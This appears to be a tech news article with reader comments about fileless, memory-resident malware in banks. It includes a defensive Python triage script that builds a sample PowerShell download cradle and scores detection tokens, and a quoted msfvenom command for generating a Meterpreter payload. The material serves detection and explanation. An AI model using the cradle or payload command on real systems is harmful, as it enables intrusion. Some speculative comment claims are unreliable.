A type of fileless malware related to Stuxnet has infected over 100 banks around the world

midian182


It’s been seven years since Stuxnet, the computer worm thought to have been built as an American-Israeli cyberweapon, infected Iran’s nuclear facilities and caused damage that set the country’s nuclear program back by two years. Now, a derivative of the malicious software has infected over one hundred banks and other financial institutions around the world.

Russian cybersecurity company and anti-virus group Kaspersky Lab first discovered the new malware, called Duqu 2.0, on its corporate network back in 2014. As it resides almost completely in the memory of the computers, it went undetected for six months or more, reports Ars Technica.

New research from Kaspersky claims the invisible, fileless malware has gone mainstream and is now found on networks in 40 countries belonging to at least 140 institutions, including banks, government organizations, and telecommunication companies. There have been 21 instances in the US, though the actual number could be much higher, given how hard it is to detect.

Once an infected computer is rebooted, the malware renames itself, making it difficult for digital forensic experts to find any traces of the malware. It was only discovered by a bank’s security team after it found a copy of Meterpreter—an in-memory component of Metasploit—inside the physical memory of a Microsoft domain controller. Researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands.

"We're looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpreter and then carry out actions from there with native Windows utilities and system administrative tools," Kaspersky Lab expert Kurt Baumgartner told Ars.

To what extent the malware's presence could affect consumers who use the infected financial institutions is unclear. Kaspersky Lab said it will provide further details of the attacks and their objectives at the Security Analyst Summit in April.
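The common denominator Baumgartner describes, a PowerShell command stored in the registry that pulls a stage straight into memory, leaves a footprint a defender can hunt for even when nothing lands on disk: the command line itself in Run keys and service ImagePath values. The script below is an added example, not code from the article or from Kaspersky; it assumes the registry values have already been exported into a dict, uses constructed sample entries (the value names, paths and the decoded stage string are invented), and the token weights are a heuristic chosen for illustration rather than anything from the report. It decodes any -EncodedCommand blob (UTF-16LE base64, which is how PowerShell expects it) and ranks entries by the indicators found in the visible and decoded text.

```python
import base64
import re

# Constructed sample data (invented for this example, not taken from the
# Kaspersky report): autorun and service command lines as a defender might
# export them from Run keys and service ImagePath values on a host.
DECODED_SAMPLE = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')"
ENCODED_SAMPLE = base64.b64encode(DECODED_SAMPLE.encode("utf-16le")).decode("ascii")

SAMPLE_REGISTRY = {
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler\ImagePath":
        r"C:\Windows\System32\spoolsv.exe",
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backup":
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r"HKLM\SYSTEM\CurrentControlSet\Services\WinUpdSvc\ImagePath":
        "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -enc " + ENCODED_SAMPLE,
}

POWERSHELL_RE = re.compile(r"powershell(?:\.exe)?", re.I)
# Common spellings of -EncodedCommand followed by a base64 blob. PowerShell
# also accepts other unambiguous prefixes (-enco, -encod, ...); extend as needed.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Heuristic weights (chosen for this example): launch-hiding switches score
# low, download cradles and memory-allocation APIs score high.
SUSPICIOUS_TOKENS = {
    "-w hidden": 1, "-nop": 1, "-noni": 1, "ExecutionPolicy Bypass": 1,
    "Net.WebClient": 2, "FromBase64String": 2,
    "IEX": 3, "Invoke-Expression": 3, "DownloadString": 3, "DownloadData": 3,
    "VirtualAlloc": 4, "CreateThread": 4,
}
ENCODED_COMMAND_WEIGHT = 2


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:
        return None
    # PowerShell expects the encoded command to be UTF-16LE.
    return raw.decode("utf-16le", errors="replace")


def _has_token(text, token):
    # Word-ish boundaries so "IEX" is not matched inside "index" or a base64 blob.
    pattern = r"(?<![A-Za-z0-9])" + re.escape(token) + r"(?![A-Za-z0-9])"
    return re.search(pattern, text, re.I) is not None


def score_command(cmdline):
    """Score one registry command line; returns (score, reasons, decoded_text)."""
    if not POWERSHELL_RE.search(cmdline):
        return 0, [], None
    score, reasons = 0, []
    decoded = decode_encoded_command(cmdline)
    # Scan the command line without the base64 blob, plus whatever it decodes to.
    text = ENC_RE.sub(" ", cmdline)
    if decoded is not None:
        score += ENCODED_COMMAND_WEIGHT
        reasons.append("encoded command decodes to: " + decoded)
        text += " " + decoded
    for token, weight in SUSPICIOUS_TOKENS.items():
        if _has_token(text, token):
            score += weight
            reasons.append("contains " + token)
    return score, reasons, decoded


def triage(registry):
    """Rank registry values that launch PowerShell, most suspicious first."""
    findings = []
    for key, cmdline in registry.items():
        score, reasons, decoded = score_command(cmdline)
        if score > 0:
            findings.append({"key": key, "score": score, "reasons": reasons, "decoded": decoded})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for finding in triage(SAMPLE_REGISTRY):
        print(finding["score"], finding["key"])
        for reason in finding["reasons"]:
            print("   ", reason)
```

On a real host the dict would come from a registry export or a remote query of the Run keys and each service's ImagePath; the useful part of the output is the decoded text, which is what analysts would otherwise have to recover from a memory image of the domain controller. A service whose ImagePath starts a hidden, non-interactive PowerShell with an encoded command has very few legitimate explanations, so the high-scoring entry is the one to pull the service creation event and the SC/PowerShell process logs for.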


 
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.
 
Been wondering when Stuxnet would come around to bite us. Actually there are several ways to "hide" the code so it reloads on reboot and there are more than a few examples of the code hidden in "other than hard drive". My favorite was the one that could reside in the 16k buffer on the keyboard ..... never did figure out how that one survived!
 
... don't forget the attached printer and the GPU where no AV can look for it.
 
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.

That excerpt was excluded from this article, the full description can be found in the link

Here is what you are looking for

"This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:

msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd

After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host."
 
Way back before 9/11 and iPhones, these were named Virus for very good reason -
it is too painfully comical if Stux returns -and Years later- to haunt its inventors. Hubris S(t)ux
 
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.

Depends. A soft-reboot won't necessarily clear the memory. A hard shut-down is supposed to. It may also be writing itself to non-volatile memory before shutdown is complete and then writing back to memory upon startup.
 
But if it resides in memory... on reboot wouldn't it simply be cleared? I mean it makes sense in a network to spread and then keep on spreading, could it be the windows hybrid shutdown that is letting it survive? Quite impressive though.

Depends. A soft-reboot won't necessarily clear the memory. A hard shut-down is supposed to. It may also be writing itself to non-volatile memory before shutdown is complete and then writing back to memory upon startup.

Another thing to keep in mind is that capacitors can sometimes hold enough charge long enough to keep an item working for a very short period...as in when you unplug a radio or something like that and the light is still on for just a second or two.
 